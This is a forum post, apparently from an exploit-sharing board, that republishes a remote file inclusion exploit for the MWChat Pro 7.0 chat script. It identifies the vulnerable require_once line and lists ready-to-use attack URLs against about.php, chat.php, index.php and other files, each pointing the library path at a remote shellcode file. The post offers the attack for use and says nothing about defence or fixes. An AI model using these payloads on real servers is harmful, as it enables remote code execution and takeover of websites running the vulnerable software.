Jump to content
alexcargo

MWChat Pro V7.0

By alexcargo, in Exploituri

Recommended Posts

alexcargo Newbie

alexcargo

Posted
Posted

Class = Remote File Inclusion

URL :

http://www.appindex.net/products/download/?product=mwchat&version=7.0

Found by = Mr.3FReeT ..

################################################

code in :.

about.php , buddy.php , chat.php , dialog.php , head.php , help.php ,

index.php , license.php ..... nearly all :D

require_once("$CONFIG[MWCHAT_Libs]/security.php");

################################################

Exploit:

""""""""

http://[target]/[path]/about.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

http://[target]/[path]/buddy.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

http://[target]/[path]/chat.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

http://[target]/[path]/dialog.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

http://[target]/[path]/head.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

http://[target]/[path]/help.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

http://[target]/[path]/index.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

http://[target]/[path]/license.php?CONFIG[MWCHAT_Libs]=shellcode.txt?

################################################

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...